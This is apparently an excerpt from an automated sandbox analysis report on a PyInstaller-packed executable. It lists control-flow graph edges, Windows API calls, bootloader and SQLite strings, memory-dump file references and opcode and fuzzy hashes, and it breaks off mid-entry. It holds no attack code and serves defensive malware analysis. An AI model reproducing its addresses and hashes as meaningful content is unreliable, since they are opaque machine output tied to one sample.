7ff7c26638a5-7ff7c26638ad 657->663 664 7ff7c26638af-7ff7c26638bd call 7ff7c2668b90 657->664 669 7ff7c26639fc-7ff7c2663a2a call 7ff7c2668b30 call 7ff7c2668b90 * 3 658->669 670 7ff7c26638d2-7ff7c26638e1 call 7ff7c2668a20 658->670 675 7ff7c26639b0-7ff7c26639b9 660->675 661->650 662->638 663->664 664->658 698 7ff7c2663a2f-7ff7c2663a3e call 7ff7c2668a20 669->698 679 7ff7c26638e7-7ff7c26638ed 670->679 680 7ff7c26639f4-7ff7c26639f7 call 7ff7c2674fa0 670->680 675->675 678 7ff7c26639bb-7ff7c26639d8 call 7ff7c2661950 675->678 678->647 690 7ff7c26639de-7ff7c26639ef call 7ff7c2662710 678->690 684 7ff7c26638f0-7ff7c26638fc 679->684 680->669 687 7ff7c26638fe-7ff7c2663903 684->687 688 7ff7c2663905-7ff7c2663908 684->688 687->684 687->688 688->680 691 7ff7c266390e-7ff7c2663916 call 7ff7c2674fa0 688->691 690->662 691->698 701 7ff7c2663a44-7ff7c2663a47 698->701 702 7ff7c2663b45-7ff7c2663b53 698->702 701->702 705 7ff7c2663a4d-7ff7c2663a50 701->705 703 7ff7c2663a67 702->703 704 7ff7c2663b59-7ff7c2663b5d 702->704 708 7ff7c2663a6b-7ff7c2663a90 call 7ff7c2674fa0 703->708 704->708 706 7ff7c2663b14-7ff7c2663b17 705->706 707 7ff7c2663a56-7ff7c2663a5a 705->707 710 7ff7c2663b19-7ff7c2663b1d 706->710 711 7ff7c2663b2f-7ff7c2663b40 call 7ff7c2662710 706->711 707->706 709 7ff7c2663a60 707->709 717 7ff7c2663aab-7ff7c2663ac0 708->717 718 7ff7c2663a92-7ff7c2663aa6 call 7ff7c2668b30 708->718 709->703 710->711 713 7ff7c2663b1f-7ff7c2663b2a 710->713 719 7ff7c2663c7f-7ff7c2663c87 711->719 713->708 721 7ff7c2663be8-7ff7c2663bfa call 7ff7c2668a20 717->721 722 7ff7c2663ac6-7ff7c2663aca 717->722 718->717 719->662 730 7ff7c2663bfc-7ff7c2663c02 721->730 731 7ff7c2663c2e 721->731 724 7ff7c2663bcd-7ff7c2663be2 call 7ff7c2661940 722->724 725 7ff7c2663ad0-7ff7c2663ae8 call 7ff7c26752c0 722->725 724->721 724->722 735 7ff7c2663aea-7ff7c2663b02 call 7ff7c26752c0 725->735 736 7ff7c2663b62-7ff7c2663b7a call 7ff7c26752c0 725->736 733 7ff7c2663c1e-7ff7c2663c2c 730->733 734 7ff7c2663c04-7ff7c2663c1c 730->734 737 7ff7c2663c31-7ff7c2663c40 call 7ff7c2674fa0 731->737 733->737 734->737 735->724 744 7ff7c2663b08-7ff7c2663b0f 735->744 747 7ff7c2663b7c-7ff7c2663b80 736->747 748 7ff7c2663b87-7ff7c2663b9f call 7ff7c26752c0 736->748 745 7ff7c2663c46-7ff7c2663c4a 737->745 746 7ff7c2663d41-7ff7c2663d63 call 7ff7c26644d0 737->746 744->724 749 7ff7c2663cd4-7ff7c2663ce6 call 7ff7c2668a20 745->749 750 7ff7c2663c50-7ff7c2663c5f call 7ff7c26690e0 745->750 761 7ff7c2663d65-7ff7c2663d6f call 7ff7c2664620 746->761 762 7ff7c2663d71-7ff7c2663d82 call 7ff7c2661c80 746->762 747->748 757 7ff7c2663bac-7ff7c2663bc4 call 7ff7c26752c0 748->757 758 7ff7c2663ba1-7ff7c2663ba5 748->758 766 7ff7c2663ce8-7ff7c2663ceb 749->766 767 7ff7c2663d35-7ff7c2663d3c 749->767 764 7ff7c2663cb3-7ff7c2663cbd call 7ff7c2668850 750->764 765 7ff7c2663c61 750->765 757->724 777 7ff7c2663bc6 757->777 758->757 775 7ff7c2663d87-7ff7c2663d96 761->775 762->775 783 7ff7c2663cc8-7ff7c2663ccf 764->783 784 7ff7c2663cbf-7ff7c2663cc6 764->784 772 7ff7c2663c68 call 7ff7c2662710 765->772 766->767 773 7ff7c2663ced-7ff7c2663d10 call 7ff7c2661c80 766->773 767->772 785 7ff7c2663c6d-7ff7c2663c77 772->785 789 7ff7c2663d2b-7ff7c2663d33 call 7ff7c2674fa0 773->789 790 7ff7c2663d12-7ff7c2663d26 call 7ff7c2662710 call 7ff7c2674fa0 773->790 780 7ff7c2663d98-7ff7c2663d9f 775->780 781 7ff7c2663dc4-7ff7c2663dda call 7ff7c2669400 775->781 777->724 780->781 787 7ff7c2663da1-7ff7c2663da5 780->787 793 7ff7c2663ddc 781->793 794 7ff7c2663de8-7ff7c2663e04 SetDllDirectoryW 781->794 783->775 784->772 785->719 787->781 791 7ff7c2663da7-7ff7c2663dbe SetDllDirectoryW LoadLibraryExW 787->791 789->775 790->785 791->781 793->794 797 7ff7c2663e0a-7ff7c2663e19 call 7ff7c2668a20 794->797 798 7ff7c2663f01-7ff7c2663f08 794->798 811 7ff7c2663e1b-7ff7c2663e21 797->811 812 7ff7c2663e32-7ff7c2663e3c call 7ff7c2674fa0 797->812 800 7ff7c2663ffc-7ff7c2664004 798->800 801 7ff7c2663f0e-7ff7c2663f15 798->801 805 7ff7c2664029-7ff7c2664034 call 7ff7c26636a0 call 7ff7c2663360 800->805 806 7ff7c2664006-7ff7c2664023 PostMessageW GetMessageW 800->806 801->800 804 7ff7c2663f1b-7ff7c2663f25 call 7ff7c26633c0 801->804 804->785 818 7ff7c2663f2b-7ff7c2663f3f call 7ff7c26690c0 804->818 822 7ff7c2664039-7ff7c266405b call 7ff7c2663670 call 7ff7c2666fb0 call 7ff7c2666d60 805->822 806->805 815 7ff7c2663e2d-7ff7c2663e2f 811->815 816 7ff7c2663e23-7ff7c2663e2b 811->816 823 7ff7c2663ef2-7ff7c2663efc call 7ff7c2668b30 812->823 824 7ff7c2663e42-7ff7c2663e48 812->824 815->812 816->815 831 7ff7c2663f64-7ff7c2663fa7 call 7ff7c2668b30 call 7ff7c2668bd0 call 7ff7c2666fb0 call 7ff7c2666d60 call 7ff7c2668ad0 818->831 832 7ff7c2663f41-7ff7c2663f5e PostMessageW GetMessageW 818->832 823->798 824->823 825 7ff7c2663e4e-7ff7c2663e54 824->825 829 7ff7c2663e56-7ff7c2663e58 825->829 830 7ff7c2663e5f-7ff7c2663e61 825->830 834 7ff7c2663e67-7ff7c2663e83 call 7ff7c2666db0 call 7ff7c2667330 829->834 835 7ff7c2663e5a 829->835 830->798 830->834 870 7ff7c2663fe9-7ff7c2663ff7 call 7ff7c2661900 831->870 871 7ff7c2663fa9-7ff7c2663fb3 call 7ff7c2669200 831->871 832->831 849 7ff7c2663e8e-7ff7c2663e95 834->849 850 7ff7c2663e85-7ff7c2663e8c 834->850 835->798 854 7ff7c2663e97-7ff7c2663ea4 call 7ff7c2666df0 849->854 855 7ff7c2663eaf-7ff7c2663eb9 call 7ff7c26671a0 849->855 853 7ff7c2663edb-7ff7c2663ef0 call 7ff7c2662a50 call 7ff7c2666fb0 call 7ff7c2666d60 850->853 853->798 854->855 868 7ff7c2663ea6-7ff7c2663ead 854->868 864 7ff7c2663ebb-7ff7c2663ec2 855->864 865 7ff7c2663ec4-7ff7c2663ed2 call 7ff7c26674e0 855->865 864->853 865->798 878 7ff7c2663ed4 865->878 868->853 870->785 871->870 881 7ff7c2663fb5-7ff7c2663fca 871->881 878->853 882 7ff7c2663fcc-7ff7c2663fdf call 7ff7c2662710 call 7ff7c2661900 881->882 883 7ff7c2663fe4 call 7ff7c2662a50 881->883 882->785 883->870
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                                    • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                                    • Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                                                    • Instruction ID: a126fb637c7a3bb1d0b2850f1203ae32a2a722ba97f7b845208a13040d220de5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13328021A0868291FB14BF2194543B9A673AF55BA4FC44032DACD63BD6DFBCE568C334
                                                                                                                                                                                                                                                                    Function 00007FFB0C0392B0 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1769 7ffb0c0392b0-7ffb0c03932f 1770 7ffb0c03948d-7ffb0c0394a3 1769->1770 1771 7ffb0c039335-7ffb0c03933f 1769->1771 1773 7ffb0c03939f-7ffb0c0393e5 call 7ffb0c026180 1770->1773 1774 7ffb0c0394a9-7ffb0c0394af 1770->1774 1771->1770 1772 7ffb0c039345-7ffb0c039348 1771->1772 1772->1774 1775 7ffb0c03934e 1772->1775 1783 7ffb0c039a7e-7ffb0c039a81 1773->1783 1784 7ffb0c0393eb-7ffb0c03944f call 7ffb0c15380c 1773->1784 1774->1773 1776 7ffb0c0394b5-7ffb0c0394cb call 7ffb0c026180 1774->1776 1778 7ffb0c039355-7ffb0c03935e 1775->1778 1787 7ffb0c039ade 1776->1787 1788 7ffb0c0394d1-7ffb0c0394ec 1776->1788 1778->1778 1781 7ffb0c039360-7ffb0c03936f call 7ffb0c026180 1778->1781 1781->1787 1799 7ffb0c039375-7ffb0c03938b 00007FFB1C263010 1781->1799 1783->1787 1789 7ffb0c039a83-7ffb0c039a8a 1783->1789 1797 7ffb0c039455-7ffb0c039471 00007FFB1C263010 1784->1797 1798 7ffb0c039778-7ffb0c039788 1784->1798 1792 7ffb0c039ae3-7ffb0c039afa 1787->1792 1805 7ffb0c0394ee-7ffb0c0394ff 1788->1805 1806 7ffb0c039506-7ffb0c03950d 1788->1806 1793 7ffb0c039a8c-7ffb0c039a96 1789->1793 1794 7ffb0c039ad5 1789->1794 1795 7ffb0c039a9e-7ffb0c039acb 1793->1795 1796 7ffb0c039a98 1793->1796 1794->1787 1795->1787 1828 7ffb0c039acd-7ffb0c039ad3 1795->1828 1796->1795 1801 7ffb0c03962b 1797->1801 1802 7ffb0c039477-7ffb0c039488 00007FFB1C263010 1797->1802 1803 7ffb0c0396cf-7ffb0c0396f4 1798->1803 1804 7ffb0c039390-7ffb0c039397 1799->1804 1808 7ffb0c03962e-7ffb0c039677 00007FFB1C263010 * 2 1801->1808 1802->1808 1809 7ffb0c03982f 1803->1809 1810 7ffb0c0396fa-7ffb0c0396ff 1803->1810 1804->1804 1811 7ffb0c039399 1804->1811 1805->1806 1812 7ffb0c039510-7ffb0c039517 1806->1812 1815 7ffb0c0396cd 1808->1815 1816 7ffb0c039679-7ffb0c039680 1808->1816 1817 7ffb0c039834-7ffb0c039842 1809->1817 1810->1809 1813 7ffb0c039705-7ffb0c039731 call 7ffb0c02ffd0 1810->1813 1811->1773 1812->1812 1814 7ffb0c039519-7ffb0c039520 1812->1814 1829 7ffb0c039734-7ffb0c039754 1813->1829 1818 7ffb0c039527-7ffb0c03952e 1814->1818 1815->1803 1820 7ffb0c039686-7ffb0c039690 1816->1820 1821 7ffb0c03976a-7ffb0c039773 1816->1821 1822 7ffb0c039845-7ffb0c039848 1817->1822 1818->1818 1823 7ffb0c039530-7ffb0c039547 1818->1823 1824 7ffb0c039692 1820->1824 1825 7ffb0c039698-7ffb0c0396c5 1820->1825 1821->1815 1826 7ffb0c03984e-7ffb0c039869 call 7ffb0c038830 1822->1826 1827 7ffb0c0398fb-7ffb0c039905 1822->1827 1832 7ffb0c039549 1823->1832 1833 7ffb0c039597-7ffb0c03959e 1823->1833 1824->1825 1825->1815 1866 7ffb0c0396c7 1825->1866 1826->1827 1848 7ffb0c03986f-7ffb0c0398f3 1826->1848 1834 7ffb0c039913-7ffb0c039926 call 7ffb0c0346f0 1827->1834 1835 7ffb0c039907-7ffb0c039910 1827->1835 1828->1787 1836 7ffb0c03982a-7ffb0c03982d 1829->1836 1837 7ffb0c03975a-7ffb0c039764 1829->1837 1840 7ffb0c039550-7ffb0c039557 1832->1840 1843 7ffb0c0395c2-7ffb0c0395c9 1833->1843 1844 7ffb0c0395a0-7ffb0c0395a7 1833->1844 1863 7ffb0c03992c-7ffb0c039936 1834->1863 1864 7ffb0c039a70-7ffb0c039a7c 1834->1864 1835->1834 1836->1822 1838 7ffb0c03978d-7ffb0c039790 1837->1838 1839 7ffb0c039766-7ffb0c039768 1837->1839 1847 7ffb0c039792-7ffb0c03979a 1838->1847 1839->1847 1849 7ffb0c039560-7ffb0c039569 1840->1849 1853 7ffb0c0395cb-7ffb0c0395d5 1843->1853 1854 7ffb0c03961a 1843->1854 1844->1773 1850 7ffb0c0395ad-7ffb0c0395bc call 7ffb0c0e5ae0 1844->1850 1858 7ffb0c0397be-7ffb0c0397d4 call 7ffb0c0e6ad0 1847->1858 1859 7ffb0c03979c-7ffb0c0397b0 call 7ffb0c037c00 1847->1859 1876 7ffb0c0398f5 1848->1876 1877 7ffb0c039959-7ffb0c03995f 1848->1877 1849->1849 1855 7ffb0c03956b-7ffb0c039579 1849->1855 1850->1773 1850->1843 1861 7ffb0c0395dd-7ffb0c03960a 1853->1861 1862 7ffb0c0395d7 1853->1862 1868 7ffb0c039623-7ffb0c039626 1854->1868 1867 7ffb0c039580-7ffb0c039589 1855->1867 1881 7ffb0c0397ed 1858->1881 1882 7ffb0c0397d6-7ffb0c0397eb call 7ffb0c09df90 1858->1882 1859->1858 1886 7ffb0c0397b2-7ffb0c0397b7 1859->1886 1861->1868 1893 7ffb0c03960c-7ffb0c039615 1861->1893 1862->1861 1871 7ffb0c03993e-7ffb0c039951 1863->1871 1872 7ffb0c039938 1863->1872 1864->1792 1866->1815 1867->1867 1875 7ffb0c03958b-7ffb0c039595 1867->1875 1868->1792 1871->1877 1872->1871 1875->1833 1875->1840 1876->1827 1884 7ffb0c039961-7ffb0c039984 1877->1884 1885 7ffb0c039988-7ffb0c039998 1877->1885 1889 7ffb0c0397ef-7ffb0c0397f4 1881->1889 1882->1889 1884->1885 1896 7ffb0c0399a0-7ffb0c0399d1 1885->1896 1897 7ffb0c03999a 1885->1897 1886->1858 1891 7ffb0c039822-7ffb0c039828 1889->1891 1892 7ffb0c0397f6-7ffb0c03980c call 7ffb0c0e6ad0 1889->1892 1891->1817 1892->1836 1902 7ffb0c03980e-7ffb0c039820 call 7ffb0c09df90 1892->1902 1893->1792 1900 7ffb0c0399e4-7ffb0c0399eb 1896->1900 1901 7ffb0c0399d3-7ffb0c0399e2 1896->1901 1897->1896 1903 7ffb0c0399ef-7ffb0c039a11 call 7ffb0c037c00 1900->1903 1901->1903 1902->1836 1902->1891 1908 7ffb0c039a13-7ffb0c039a17 1903->1908 1909 7ffb0c039a19-7ffb0c039a1c 1903->1909 1910 7ffb0c039a27-7ffb0c039a39 1908->1910 1911 7ffb0c039a1e-7ffb0c039a21 1909->1911 1912 7ffb0c039a23 1909->1912 1913 7ffb0c039a3b-7ffb0c039a42 1910->1913 1914 7ffb0c039a44-7ffb0c039a56 1910->1914 1911->1910 1911->1912 1912->1910 1915 7ffb0c039a5a-7ffb0c039a6e 1913->1915 1914->1915 1915->1792
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-4201244970
                                                                                                                                                                                                                                                                    • Opcode ID: a1f561667bbe6322790191b89becdf0bea67dc52a5ba2455568e19f1d4293569
                                                                                                                                                                                                                                                                    • Instruction ID: 53c8c0319c4ce794d61d3b2637a2eb71b9fe32fbb3f3f86bd7636842b432a36e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1f561667bbe6322790191b89becdf0bea67dc52a5ba2455568e19f1d4293569
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C329CE2A09B8286EB259F35D448B7827A5FF44BA4F484234DA6E077D4EF7CE455C308
                                                                                                                                                                                                                                                                    Function 00007FFB0C09CF30 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 441COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-509082904
                                                                                                                                                                                                                                                                    • Opcode ID: bc0f1b3d37c7c14db3c6a3fb4993dfbb8ccb39d95472aa5842e03a8855881612
                                                                                                                                                                                                                                                                    • Instruction ID: 5de30785aa94ebabfe42c2dbddb2cf50a1c5d0f066451331ead2f7a04ad961d6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc0f1b3d37c7c14db3c6a3fb4993dfbb8ccb39d95472aa5842e03a8855881612
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F012ACE2A4DB8285EB549F35E458BB967A1FF80B88F584031DE5E076A4EF3CE445C308
                                                                                                                                                                                                                                                                    Function 00007FF7C26869D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 2213 7ff7c26869d4-7ff7c2686a47 call 7ff7c2686708 2216 7ff7c2686a49-7ff7c2686a52 call 7ff7c2674f58 2213->2216 2217 7ff7c2686a61-7ff7c2686a6b call 7ff7c2678590 2213->2217 2222 7ff7c2686a55-7ff7c2686a5c call 7ff7c2674f78 2216->2222 2223 7ff7c2686a6d-7ff7c2686a84 call 7ff7c2674f58 call 7ff7c2674f78 2217->2223 2224 7ff7c2686a86-7ff7c2686aef CreateFileW 2217->2224 2236 7ff7c2686da2-7ff7c2686dc2 2222->2236 2223->2222 2227 7ff7c2686b6c-7ff7c2686b77 GetFileType 2224->2227 2228 7ff7c2686af1-7ff7c2686af7 2224->2228 2230 7ff7c2686bca-7ff7c2686bd1 2227->2230 2231 7ff7c2686b79-7ff7c2686bb4 GetLastError call 7ff7c2674eec CloseHandle 2227->2231 2233 7ff7c2686b39-7ff7c2686b67 GetLastError call 7ff7c2674eec 2228->2233 2234 7ff7c2686af9-7ff7c2686afd 2228->2234 2239 7ff7c2686bd9-7ff7c2686bdc 2230->2239 2240 7ff7c2686bd3-7ff7c2686bd7 2230->2240 2231->2222 2247 7ff7c2686bba-7ff7c2686bc5 call 7ff7c2674f78 2231->2247 2233->2222 2234->2233 2241 7ff7c2686aff-7ff7c2686b37 CreateFileW 2234->2241 2245 7ff7c2686be2-7ff7c2686c37 call 7ff7c26784a8 2239->2245 2246 7ff7c2686bde 2239->2246 2240->2245 2241->2227 2241->2233 2251 7ff7c2686c39-7ff7c2686c45 call 7ff7c2686910 2245->2251 2252 7ff7c2686c56-7ff7c2686c87 call 7ff7c2686488 2245->2252 2246->2245 2247->2222 2251->2252 2258 7ff7c2686c47 2251->2258 2259 7ff7c2686c8d-7ff7c2686ccf 2252->2259 2260 7ff7c2686c89-7ff7c2686c8b 2252->2260 2261 7ff7c2686c49-7ff7c2686c51 call 7ff7c267ab30 2258->2261 2262 7ff7c2686cf1-7ff7c2686cfc 2259->2262 2263 7ff7c2686cd1-7ff7c2686cd5 2259->2263 2260->2261 2261->2236 2266 7ff7c2686d02-7ff7c2686d06 2262->2266 2267 7ff7c2686da0 2262->2267 2263->2262 2265 7ff7c2686cd7-7ff7c2686cec 2263->2265 2265->2262 2266->2267 2268 7ff7c2686d0c-7ff7c2686d51 CloseHandle CreateFileW 2266->2268 2267->2236 2270 7ff7c2686d86-7ff7c2686d9b 2268->2270 2271 7ff7c2686d53-7ff7c2686d81 GetLastError call 7ff7c2674eec call 7ff7c26786d0 2268->2271 2270->2267 2271->2270
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                    • Instruction ID: bf498a22dbfba0db295f622562c6cd6d45920bef7404c585b36de946709df130
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CC1C232B28A41C5EB10EFA5D4906AC7762F749BA8B414235DFAEA7BD4CF78D451C320
                                                                                                                                                                                                                                                                    Function 00007FFB0C0A4C70 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-1046679716
                                                                                                                                                                                                                                                                    • Opcode ID: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
                                                                                                                                                                                                                                                                    • Instruction ID: 6fca25d5a31b20f676f460eff6547f2c613bb216fc1bd7df5a41cd4d8343d8cf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF1A3E2A08B8286EB65CF71D808BBA67A0FF85B88F085175DA4D07795EF7CE441C744
                                                                                                                                                                                                                                                                    Function 00007FFB1D5BAA40 Relevance: 6.9, APIs: 4, Instructions: 889librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
